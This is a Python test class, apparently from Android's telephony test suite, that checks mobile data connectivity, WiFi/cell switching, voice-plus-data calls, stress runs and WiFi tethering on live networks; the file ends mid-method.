class TelLiveDataTest(TelephonyBaseTest):
def __init__(self, controllers):
TelephonyBaseTest.__init__(self, controllers)
self.tests = ("test_airplane_mode",
"test_4g",
"test_3g",
"test_2g",
"test_lte_wifi_switching",
"test_wcdma_wifi_switching",
"test_gsm_wifi_switching",
"test_wifi_connect_disconnect",
"test_lte_multi_bearer",
"test_wcdma_multi_bearer",
"test_2g_wifi_not_associated",
"test_3g_wifi_not_associated",
"test_4g_wifi_not_associated",
# WiFi Tethering tests
"test_tethering_entitlement_check",
"test_tethering_2g_to_2gwifi",
"test_tethering_2g_to_5gwifi",
"test_tethering_3g_to_5gwifi",
"test_tethering_3g_to_2gwifi",
"test_tethering_4g_to_5gwifi",
"test_tethering_4g_to_2gwifi",
"test_tethering_4g_to_2gwifi_2clients",
"test_toggle_apm_during_active_wifi_tethering",
"test_toggle_data_during_active_wifi_tethering",
"test_disable_wifi_tethering_resume_connected_wifi",
"test_tethering_wifi_ssid_quotes",
"test_tethering_wifi_no_password",
"test_tethering_wifi_password_escaping_characters",
"test_tethering_wifi_ssid",
"test_tethering_wifi_password",
"test_tethering_wifi_volte_call",
"test_tethering_wifi_csfb_call",
"test_tethering_wifi_3g_call",
"test_tethering_wifi_reboot",
"test_connect_wifi_start_tethering_wifi_reboot",
"test_connect_wifi_reboot_start_tethering_wifi",
"test_tethering_wifi_screen_off_enable_doze_mode",
# stress tests
"test_4g_stress",
"test_3g_stress",
"test_lte_multi_bearer_stress",
"test_wcdma_multi_bearer_stress",
"test_tethering_4g_to_2gwifi_stress",)
self.stress_test_number = int(self.user_params["stress_test_number"])
self.wifi_network_ssid = self.user_params["wifi_network_ssid"]
try:
self.wifi_network_pass = self.user_params["wifi_network_pass"]
except KeyError:
self.wifi_network_pass = None
@TelephonyBaseTest.tel_test_wrap
def test_airplane_mode(self):
""" Test airplane mode basic on Phone and Live SIM.
Ensure phone attach, data on, WiFi off and verify Internet.
Turn on airplane mode to make sure detach.
Turn off airplane mode to make sure attach.
Verify Internet connection.
Returns:
True if pass; False if fail.
"""
return airplane_mode_test(self.log, self.android_devices[0])
@TelephonyBaseTest.tel_test_wrap
def test_lte_wifi_switching(self):
"""Test data connection network switching when phone camped on LTE.
Ensure phone is camped on LTE
Ensure WiFi can connect to live network,
Airplane mode is off, data connection is on, WiFi is on.
Turn off WiFi, verify data is on cell and browse to google.com is OK.
Turn on WiFi, verify data is on WiFi and browse to google.com is OK.
Turn off WiFi, verify data is on cell and browse to google.com is OK.
Returns:
True if pass.
"""
return wifi_cell_switching(self.log, self.android_devices[0],
self.wifi_network_ssid,
self.wifi_network_pass, GEN_4G)
@TelephonyBaseTest.tel_test_wrap
def test_wcdma_wifi_switching(self):
"""Test data connection network switching when phone camped on WCDMA.
Ensure phone is camped on WCDMA
Ensure WiFi can connect to live network,
Airplane mode is off, data connection is on, WiFi is on.
Turn off WiFi, verify data is on cell and browse to google.com is OK.
Turn on WiFi, verify data is on WiFi and browse to google.com is OK.
Turn off WiFi, verify data is on cell and browse to google.com is OK.
Returns:
True if pass.
"""
return wifi_cell_switching(self.log, self.android_devices[0],
self.wifi_network_ssid,
self.wifi_network_pass, GEN_3G)
@TelephonyBaseTest.tel_test_wrap
def test_gsm_wifi_switching(self):
"""Test data connection network switching when phone camped on GSM.
Ensure phone is camped on GSM
Ensure WiFi can connect to live network,,
Airplane mode is off, data connection is on, WiFi is on.
Turn off WiFi, verify data is on cell and browse to google.com is OK.
Turn on WiFi, verify data is on WiFi and browse to google.com is OK.
Turn off WiFi, verify data is on cell and browse to google.com is OK.
Returns:
True if pass.
"""
return wifi_cell_switching(self.log, self.android_devices[0],
self.wifi_network_ssid,
self.wifi_network_pass, GEN_2G)
@TelephonyBaseTest.tel_test_wrap
def test_lte_multi_bearer(self):
"""Test LTE data connection before call and in call. (VoLTE call)
Turn off airplane mode, disable WiFi, enable Cellular Data.
Make sure phone in LTE, verify Internet.
Initiate a voice call. verify Internet.
Disable Cellular Data, verify Internet is inaccessible.
Enable Cellular Data, verify Internet.
Hangup Voice Call, verify Internet.
Returns:
True if success.
False if failed.
"""
if not phone_setup_volte(self.log, self.android_devices[0]):
self.log.error("Failed to setup VoLTE")
return False
return self._test_data_connectivity_multi_bearer(GEN_4G)
@TelephonyBaseTest.tel_test_wrap
def test_wcdma_multi_bearer(self):
"""Test WCDMA data connection before call and in call.
Turn off airplane mode, disable WiFi, enable Cellular Data.
Make sure phone in WCDMA, verify Internet.
Initiate a voice call. verify Internet.
Disable Cellular Data, verify Internet is inaccessible.
Enable Cellular Data, verify Internet.
Hangup Voice Call, verify Internet.
Returns:
True if success.
False if failed.
"""
return self._test_data_connectivity_multi_bearer(GEN_3G)
@TelephonyBaseTest.tel_test_wrap
def test_gsm_multi_bearer_mo(self):
"""Test gsm data connection before call and in call.
Turn off airplane mode, disable WiFi, enable Cellular Data.
Make sure phone in GSM, verify Internet.
Initiate a MO voice call. Verify there is no Internet during call.
Hangup Voice Call, verify Internet.
Returns:
True if success.
False if failed.
"""
return self._test_data_connectivity_multi_bearer(GEN_2G,
False, DIRECTION_MOBILE_ORIGINATED)
@TelephonyBaseTest.tel_test_wrap
def test_gsm_multi_bearer_mt(self):
"""Test gsm data connection before call and in call.
Turn off airplane mode, disable WiFi, enable Cellular Data.
Make sure phone in GSM, verify Internet.
Initiate a MT voice call. Verify there is no Internet during call.
Hangup Voice Call, verify Internet.
Returns:
True if success.
False if failed.
"""
return self._test_data_connectivity_multi_bearer(GEN_2G,
False, DIRECTION_MOBILE_TERMINATED)
@TelephonyBaseTest.tel_test_wrap
def test_wcdma_multi_bearer_stress(self):
"""Stress Test WCDMA data connection before call and in call.
This is a stress test for "test_wcdma_multi_bearer".
Default MINIMUM_SUCCESS_RATE is set to 95%.
Returns:
True stress pass rate is higher than MINIMUM_SUCCESS_RATE.
False otherwise.
"""
ads = self.android_devices
MINIMUM_SUCCESS_RATE = .95
success_count = 0
fail_count = 0
for i in range(1, self.stress_test_number + 1):
ensure_phones_default_state(
self.log, [self.android_devices[0], self.android_devices[1]])
if self.test_wcdma_multi_bearer():
success_count += 1
result_str = "Succeeded"
else:
fail_count += 1
result_str = "Failed"
self.log.info("Iteration {} {}. Current: {} / {} passed.".format(
i, result_str, success_count, self.stress_test_number))
self.log.info("Final Count - Success: {}, Failure: {} - {}%".format(
success_count, fail_count, str(100 * success_count / (
success_count + fail_count))))
if success_count / (
success_count + fail_count) >= MINIMUM_SUCCESS_RATE:
return True
else:
return False
@TelephonyBaseTest.tel_test_wrap
def test_lte_multi_bearer_stress(self):
"""Stress Test LTE data connection before call and in call. (VoLTE call)
This is a stress test for "test_lte_multi_bearer".
Default MINIMUM_SUCCESS_RATE is set to 95%.
Returns:
True stress pass rate is higher than MINIMUM_SUCCESS_RATE.
False otherwise.
"""
ads = self.android_devices
MINIMUM_SUCCESS_RATE = .95
success_count = 0
fail_count = 0
for i in range(1, self.stress_test_number + 1):
ensure_phones_default_state(
self.log, [self.android_devices[0], self.android_devices[1]])
if self.test_lte_multi_bearer():
success_count += 1
result_str = "Succeeded"
else:
fail_count += 1
result_str = "Failed"
self.log.info("Iteration {} {}. Current: {} / {} passed.".format(
i, result_str, success_count, self.stress_test_number))
self.log.info("Final Count - Success: {}, Failure: {} - {}%".format(
success_count, fail_count, str(100 * success_count / (
success_count + fail_count))))
if success_count / (
success_count + fail_count) >= MINIMUM_SUCCESS_RATE:
return True
else:
return False
def _test_data_connectivity_multi_bearer(self, nw_gen,
simultaneous_voice_data=True,
call_direction=DIRECTION_MOBILE_ORIGINATED):
"""Test data connection before call and in call.
Turn off airplane mode, disable WiFi, enable Cellular Data.
Make sure phone in <nw_gen>, verify Internet.
Initiate a voice call.
if simultaneous_voice_data is True, then:
Verify Internet.
Disable Cellular Data, verify Internet is inaccessible.
Enable Cellular Data, verify Internet.
if simultaneous_voice_data is False, then:
Verify Internet is not available during voice call.
Hangup Voice Call, verify Internet.
Returns:
True if success.
False if failed.
"""
class _LocalException(Exception):
pass
ad_list = [self.android_devices[0], self.android_devices[1]]
ensure_phones_idle(self.log, ad_list)
if not ensure_network_generation_for_subscription(self.log,
self.android_devices[0],
self.android_devices[0].droid.subscriptionGetDefaultDataSubId(),
nw_gen, MAX_WAIT_TIME_NW_SELECTION,
NETWORK_SERVICE_DATA):
self.log.error("Device failed to reselect in {}s.".format(
MAX_WAIT_TIME_NW_SELECTION))
return False
if not wait_for_voice_attach_for_subscription(
self.log, self.android_devices[0], self.android_devices[
0].droid.subscriptionGetDefaultVoiceSubId(),
MAX_WAIT_TIME_NW_SELECTION):
return False
self.log.info("Step1 WiFi is Off, Data is on Cell.")
toggle_airplane_mode(self.log, self.android_devices[0], False)
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], False)
self.android_devices[0].droid.telephonyToggleDataConnection(True)
if (not wait_for_cell_data_connection(self.log,
self.android_devices[0], True) or
not verify_http_connection(self.log, self.android_devices[0])):
self.log.error("Data not available on cell")
return False
try:
self.log.info("Step2 Initiate call and accept.")
if call_direction == DIRECTION_MOBILE_ORIGINATED:
ad_caller = self.android_devices[0]
ad_callee = self.android_devices[1]
else:
ad_caller = self.android_devices[1]
ad_callee = self.android_devices[0]
if not call_setup_teardown(self.log, ad_caller, ad_callee, None,
None, None):
self.log.error("Failed to Establish {} Voice Call".format(
call_direction))
return False
if simultaneous_voice_data:
self.log.info("Step3 Verify internet.")
time.sleep(WAIT_TIME_ANDROID_STATE_SETTLING)
if not verify_http_connection(self.log, self.android_devices[0]):
raise _LocalException("Internet Inaccessible when Enabled")
self.log.info("Step4 Turn off data and verify not connected.")
self.android_devices[0].droid.telephonyToggleDataConnection(False)
if not wait_for_cell_data_connection(
self.log, self.android_devices[0], False):
raise _LocalException("Failed to Disable Cellular Data")
if verify_http_connection(self.log, self.android_devices[0]):
raise _LocalException("Internet Accessible when Disabled")
self.log.info("Step5 Re-enable data.")
self.android_devices[0].droid.telephonyToggleDataConnection(True)
if not wait_for_cell_data_connection(
self.log, self.android_devices[0], True):
raise _LocalException("Failed to Re-Enable Cellular Data")
if not verify_http_connection(self.log, self.android_devices[0]):
raise _LocalException("Internet Inaccessible when Enabled")
else:
self.log.info("Step3 Verify no Internet and skip step 4-5.")
if verify_http_connection(self.log, self.android_devices[0],
retry=0):
raise _LocalException("Internet Accessible.")
self.log.info("Step6 Verify phones still in call and Hang up.")
if not verify_incall_state(
self.log,
[self.android_devices[0], self.android_devices[1]], True):
return False
if not hangup_call(self.log, self.android_devices[0]):
self.log.error("Failed to hang up call")
return False
if not verify_http_connection(self.log, self.android_devices[0]):
raise _LocalException("Internet Inaccessible when Enabled")
except _LocalException as e:
self.log.error(str(e))
try:
hangup_call(self.log, self.android_devices[0])
self.android_devices[0].droid.telephonyToggleDataConnection(
True)
except Exception:
pass
return False
return True
@TelephonyBaseTest.tel_test_wrap
def test_2g(self):
"""Test data connection in 2G.
Turn off airplane mode, disable WiFi, enable Cellular Data.
Ensure phone data generation is 2G.
Verify Internet.
Disable Cellular Data, verify Internet is inaccessible.
Enable Cellular Data, verify Internet.
Returns:
True if success.
False if failed.
"""
WifiUtils.wifi_reset(self.log, self.android_devices[0])
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], False)
return data_connectivity_single_bearer(self.log,
self.android_devices[0], RAT_2G)
@TelephonyBaseTest.tel_test_wrap
def test_2g_wifi_not_associated(self):
"""Test data connection in 2G.
Turn off airplane mode, enable WiFi (but not connected), enable Cellular Data.
Ensure phone data generation is 2G.
Verify Internet.
Disable Cellular Data, verify Internet is inaccessible.
Enable Cellular Data, verify Internet.
Returns:
True if success.
False if failed.
"""
WifiUtils.wifi_reset(self.log, self.android_devices[0])
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], False)
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], True)
return data_connectivity_single_bearer(self.log,
self.android_devices[0], RAT_2G)
@TelephonyBaseTest.tel_test_wrap
def test_3g(self):
"""Test data connection in 3G.
Turn off airplane mode, disable WiFi, enable Cellular Data.
Ensure phone data generation is 3G.
Verify Internet.
Disable Cellular Data, verify Internet is inaccessible.
Enable Cellular Data, verify Internet.
Returns:
True if success.
False if failed.
"""
WifiUtils.wifi_reset(self.log, self.android_devices[0])
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], False)
return data_connectivity_single_bearer(self.log,
self.android_devices[0], RAT_3G)
@TelephonyBaseTest.tel_test_wrap
def test_3g_wifi_not_associated(self):
"""Test data connection in 3G.
Turn off airplane mode, enable WiFi (but not connected), enable Cellular Data.
Ensure phone data generation is 3G.
Verify Internet.
Disable Cellular Data, verify Internet is inaccessible.
Enable Cellular Data, verify Internet.
Returns:
True if success.
False if failed.
"""
WifiUtils.wifi_reset(self.log, self.android_devices[0])
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], False)
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], True)
return data_connectivity_single_bearer(self.log,
self.android_devices[0], RAT_3G)
@TelephonyBaseTest.tel_test_wrap
def test_4g(self):
"""Test data connection in 4g.
Turn off airplane mode, disable WiFi, enable Cellular Data.
Ensure phone data generation is 4g.
Verify Internet.
Disable Cellular Data, verify Internet is inaccessible.
Enable Cellular Data, verify Internet.
Returns:
True if success.
False if failed.
"""
WifiUtils.wifi_reset(self.log, self.android_devices[0])
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], False)
return data_connectivity_single_bearer(self.log,
self.android_devices[0], RAT_4G)
@TelephonyBaseTest.tel_test_wrap
def test_4g_wifi_not_associated(self):
"""Test data connection in 4g.
Turn off airplane mode, enable WiFi (but not connected), enable Cellular Data.
Ensure phone data generation is 4g.
Verify Internet.
Disable Cellular Data, verify Internet is inaccessible.
Enable Cellular Data, verify Internet.
Returns:
True if success.
False if failed.
"""
WifiUtils.wifi_reset(self.log, self.android_devices[0])
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], False)
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], True)
return data_connectivity_single_bearer(self.log,
self.android_devices[0], RAT_4G)
@TelephonyBaseTest.tel_test_wrap
def test_3g_stress(self):
"""Stress Test data connection in 3G.
This is a stress test for "test_3g".
Default MINIMUM_SUCCESS_RATE is set to 95%.
Returns:
True stress pass rate is higher than MINIMUM_SUCCESS_RATE.
False otherwise.
"""
ads = self.android_devices
MINIMUM_SUCCESS_RATE = .95
success_count = 0
fail_count = 0
for i in range(1, self.stress_test_number + 1):
ensure_phones_default_state(
self.log, [self.android_devices[0], self.android_devices[1]])
WifiUtils.wifi_reset(self.log, self.android_devices[0])
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0],
False)
if data_connectivity_single_bearer(
self.log, self.android_devices[0], RAT_3G):
success_count += 1
result_str = "Succeeded"
else:
fail_count += 1
result_str = "Failed"
self.log.info("Iteration {} {}. Current: {} / {} passed.".format(
i, result_str, success_count, self.stress_test_number))
self.log.info("Final Count - Success: {}, Failure: {} - {}%".format(
success_count, fail_count, str(100 * success_count / (
success_count + fail_count))))
if success_count / (
success_count + fail_count) >= MINIMUM_SUCCESS_RATE:
return True
else:
return False
@TelephonyBaseTest.tel_test_wrap
def test_4g_stress(self):
"""Stress Test data connection in 4g.
This is a stress test for "test_4g".
Default MINIMUM_SUCCESS_RATE is set to 95%.
Returns:
True stress pass rate is higher than MINIMUM_SUCCESS_RATE.
False otherwise.
"""
ads = self.android_devices
MINIMUM_SUCCESS_RATE = .95
success_count = 0
fail_count = 0
for i in range(1, self.stress_test_number + 1):
ensure_phones_default_state(
self.log, [self.android_devices[0], self.android_devices[1]])
WifiUtils.wifi_reset(self.log, self.android_devices[0])
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0],
False)
if data_connectivity_single_bearer(
self.log, self.android_devices[0], RAT_4G):
success_count += 1
result_str = "Succeeded"
else:
fail_count += 1
result_str = "Failed"
self.log.info("Iteration {} {}. Current: {} / {} passed.".format(
i, result_str, success_count, self.stress_test_number))
self.log.info("Final Count - Success: {}, Failure: {} - {}%".format(
success_count, fail_count, str(100 * success_count / (
success_count + fail_count))))
if success_count / (
success_count + fail_count) >= MINIMUM_SUCCESS_RATE:
return True
else:
return False
def _test_setup_tethering(self, ads, network_generation=None):
"""Pre setup steps for WiFi tethering test.
Ensure all ads are idle.
Ensure tethering provider:
turn off APM, turn off WiFI, turn on Data.
have Internet connection, no active ongoing WiFi tethering.
Returns:
True if success.
False if failed.
"""
ensure_phones_idle(self.log, ads)
if network_generation is not None:
if not ensure_network_generation_for_subscription(self.log,
self.android_devices[0],
self.android_devices[0].droid.subscriptionGetDefaultDataSubId(),
network_generation, MAX_WAIT_TIME_NW_SELECTION,
NETWORK_SERVICE_DATA):
self.log.error("Device failed to reselect in {}s.".format(
MAX_WAIT_TIME_NW_SELECTION))
return False
self.log.info("Airplane Off, Wifi Off, Data On.")
toggle_airplane_mode(self.log, self.android_devices[0], False)
WifiUtils.wifi_toggle_state(self.log, self.android_devices[0], False)
self.android_devices[0].droid.telephonyToggleDataConnection(True)
if not wait_for_cell_data_connection(self.log, self.android_devices[0],
True):
self.log.error("Failed to enable data connection.")
return False
self.log.info("Verify internet")
if not verify_http_connection(self.log, self.android_devices[0]):
self.log.error("Data not available on cell.")
return False
# Turn off active SoftAP if any.
if ads[0].droid.wifiIsApEnabled():
WifiUtils.stop_wifi_tethering(self.log, ads[0])
return True
@TelephonyBaseTest.tel_test_wrap
def test_tethering_4g_to_2gwifi(self):
"""WiFi Tethering test: LTE to WiFI 2.4G Tethering
1. DUT in LTE mode, idle.
2. DUT start 2.4G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_4G):
self.log.error("Verify 4G Internet access failed.")
return False
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=10)
@TelephonyBaseTest.tel_test_wrap
def test_tethering_4g_to_5gwifi(self):
"""WiFi Tethering test: LTE to WiFI 5G Tethering
1. DUT in LTE mode, idle.
2. DUT start 5G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_4G):
self.log.error("Verify 4G Internet access failed.")
return False
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_5G,
check_interval=10,
check_iteration=10)
@TelephonyBaseTest.tel_test_wrap
def test_tethering_3g_to_2gwifi(self):
"""WiFi Tethering test: 3G to WiFI 2.4G Tethering
1. DUT in 3G mode, idle.
2. DUT start 2.4G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_3G):
self.log.error("Verify 3G Internet access failed.")
return False
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=10)
@TelephonyBaseTest.tel_test_wrap
def test_tethering_3g_to_5gwifi(self):
"""WiFi Tethering test: 3G to WiFI 5G Tethering
1. DUT in 3G mode, idle.
2. DUT start 5G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_3G):
self.log.error("Verify 3G Internet access failed.")
return False
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_5G,
check_interval=10,
check_iteration=10)
@TelephonyBaseTest.tel_test_wrap
def test_tethering_4g_to_2gwifi_2clients(self):
"""WiFi Tethering test: LTE to WiFI 2.4G Tethering, with multiple clients
1. DUT in 3G mode, idle.
2. DUT start 5G WiFi Tethering
3. PhoneB and PhoneC disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB PhoneC
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_4G):
self.log.error("Verify 4G Internet access failed.")
return False
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1], ads[2]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=10)
@TelephonyBaseTest.tel_test_wrap
def test_tethering_2g_to_2gwifi(self):
"""WiFi Tethering test: 2G to WiFI 2.4G Tethering
1. DUT in 2G mode, idle.
2. DUT start 2.4G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_2G):
self.log.error("Verify 2G Internet access failed.")
return False
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=10)
@TelephonyBaseTest.tel_test_wrap
def test_tethering_2g_to_5gwifi(self):
"""WiFi Tethering test: 2G to WiFI 5G Tethering
1. DUT in 2G mode, idle.
2. DUT start 5G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_2G):
self.log.error("Verify 2G Internet access failed.")
return False
return wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_5G,
check_interval=10,
check_iteration=10)
@TelephonyBaseTest.tel_test_wrap
def test_disable_wifi_tethering_resume_connected_wifi(self):
"""WiFi Tethering test: WiFI connected to 2.4G network,
start (LTE) 2.4G WiFi tethering, then stop tethering
1. DUT in LTE mode, idle. WiFi connected to 2.4G Network
2. DUT start 2.4G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
5. Disable WiFi Tethering on DUT.
6. Verify DUT automatically connect to previous WiFI network
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_4G):
self.log.error("Verify 4G Internet access failed.")
return False
self.log.info("Connect WiFi.")
if not ensure_wifi_connected(self.log, ads[0], self.wifi_network_ssid,
self.wifi_network_pass):
self.log.error("WiFi connect fail.")
return False
self.log.info("Start WiFi Tethering.")
if not wifi_tethering_setup_teardown(self.log,
ads[0],
[ads[1]],
check_interval=10,
check_iteration=2):
self.log.error("WiFi Tethering failed.")
return False
if (not wait_for_wifi_data_connection(self.log, ads[0], True) or
not verify_http_connection(self.log, ads[0])):
self.log.error("Provider data did not return to Wifi")
return False
return True
@TelephonyBaseTest.tel_test_wrap
def test_toggle_data_during_active_wifi_tethering(self):
"""WiFi Tethering test: Toggle Data during active WiFi Tethering
1. DUT in LTE mode, idle.
2. DUT start 2.4G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
5. Disable Data on DUT, verify PhoneB still connected to WiFi, but no Internet access.
6. Enable Data on DUT, verify PhoneB still connected to WiFi and have Internet access.
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_4G):
self.log.error("Verify 4G Internet access failed.")
return False
try:
ssid = rand_ascii_str(10)
if not wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=2,
do_cleanup=False,
ssid=ssid):
self.log.error("WiFi Tethering failed.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
self.log.info(
"Disable Data on Provider, verify no data on Client.")
ads[0].droid.telephonyToggleDataConnection(False)
time.sleep(WAIT_TIME_DATA_STATUS_CHANGE_DURING_WIFI_TETHERING)
if verify_http_connection(self.log, ads[0]):
self.log.error("Disable data on provider failed.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
wifi_info = ads[1].droid.wifiGetConnectionInfo()
if wifi_info[WifiEnums.SSID_KEY] != ssid:
self.log.error("WiFi error. Info: {}".format(wifi_info))
return False
if verify_http_connection(self.log, ads[1]):
self.log.error("Client should not have Internet connection.")
return False
self.log.info(
"Enable Data on Provider, verify data available on Client.")
ads[0].droid.telephonyToggleDataConnection(True)
time.sleep(WAIT_TIME_DATA_STATUS_CHANGE_DURING_WIFI_TETHERING)
if not verify_http_connection(self.log, ads[0]):
self.log.error("Enable data on provider failed.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
wifi_info = ads[1].droid.wifiGetConnectionInfo()
if wifi_info[WifiEnums.SSID_KEY] != ssid:
self.log.error("WiFi error. Info: {}".format(wifi_info))
return False
if not verify_http_connection(self.log, ads[1]):
self.log.error("Client have no Internet connection!")
return False
finally:
if not wifi_tethering_cleanup(self.log, ads[0], [ads[1]]):
return False
return True
# Invalid Live Test. Can't rely on the result of this test with live network.
# Network may decide not to change the RAT when data conenction is active.
@TelephonyBaseTest.tel_test_wrap
def test_change_rat_during_active_wifi_tethering_lte_to_3g(self):
"""WiFi Tethering test: Change Cellular Data RAT generation from LTE to 3G,
during active WiFi Tethering.
1. DUT in LTE mode, idle.
2. DUT start 2.4G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verily Internet access on DUT and PhoneB
5. Change DUT Cellular Data RAT generation from LTE to 3G.
6. Verify both DUT and PhoneB have Internet access.
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_4G):
self.log.error("Verify 4G Internet access failed.")
return False
try:
if not wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=2,
do_cleanup=False):
self.log.error("WiFi Tethering failed.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
self.log.info("Provider change RAT from LTE to 3G.")
if not ensure_network_generation(
self.log,
ads[0],
RAT_3G,
voice_or_data=NETWORK_SERVICE_DATA,
toggle_apm_after_setting=False):
self.log.error("Provider failed to reselect to 3G.")
return False
time.sleep(WAIT_TIME_DATA_STATUS_CHANGE_DURING_WIFI_TETHERING)
if not verify_http_connection(self.log, ads[0]):
self.log.error("Data not available on Provider.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
if not tethering_check_internet_connection(self.log, ads[0],
[ads[1]], 10, 5):
return False
finally:
if not wifi_tethering_cleanup(self.log, ads[0], [ads[1]]):
return False
return True
# Invalid Live Test. Can't rely on the result of this test with live network.
# Network may decide not to change the RAT when data conenction is active.
@TelephonyBaseTest.tel_test_wrap
def test_change_rat_during_active_wifi_tethering_3g_to_lte(self):
"""WiFi Tethering test: Change Cellular Data RAT generation from 3G to LTE,
during active WiFi Tethering.
1. DUT in 3G mode, idle.
2. DUT start 2.4G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verily Internet access on DUT and PhoneB
5. Change DUT Cellular Data RAT generation from 3G to LTE.
6. Verify both DUT and PhoneB have Internet access.
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_3G):
self.log.error("Verify 3G Internet access failed.")
return False
try:
if not wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=2,
do_cleanup=False):
self.log.error("WiFi Tethering failed.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
self.log.info("Provider change RAT from 3G to 4G.")
if not ensure_network_generation(
self.log,
ads[0],
RAT_4G,
voice_or_data=NETWORK_SERVICE_DATA,
toggle_apm_after_setting=False):
self.log.error("Provider failed to reselect to 4G.")
return False
time.sleep(WAIT_TIME_DATA_STATUS_CHANGE_DURING_WIFI_TETHERING)
if not verify_http_connection(self.log, ads[0]):
self.log.error("Data not available on Provider.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
if not tethering_check_internet_connection(self.log, ads[0],
[ads[1]], 10, 5):
return False
finally:
if not wifi_tethering_cleanup(self.log, ads[0], [ads[1]]):
return False
return True
@TelephonyBaseTest.tel_test_wrap
def test_toggle_apm_during_active_wifi_tethering(self):
"""WiFi Tethering test: Toggle APM during active WiFi Tethering
1. DUT in LTE mode, idle.
2. DUT start 2.4G WiFi Tethering
3. PhoneB disable data, connect to DUT's softAP
4. Verify Internet access on DUT and PhoneB
5. DUT toggle APM on, verify WiFi tethering stopped, PhoneB lost WiFi connection.
6. DUT toggle APM off, verify PhoneA have cellular data and Internet connection.
Returns:
True if success.
False if failed.
"""
ads = self.android_devices
if not self._test_setup_tethering(ads, RAT_4G):
self.log.error("Verify 4G Internet access failed.")
return False
try:
ssid = rand_ascii_str(10)
if not wifi_tethering_setup_teardown(
self.log,
ads[0],
[ads[1]],
ap_band=WifiUtils.WIFI_CONFIG_APBAND_2G,
check_interval=10,
check_iteration=2,
do_cleanup=False,
ssid=ssid):
self.log.error("WiFi Tethering failed.")
return False
if not ads[0].droid.wifiIsApEnabled():
self.log.error("Provider WiFi tethering stopped.")
return False
self.log.info(
"Provider turn on APM, verify no wifi/data on Client.")
if not toggle_airplane_mode(self.log, ads[0], True):
self.log.error("Provider turn on APM failed.")
return False
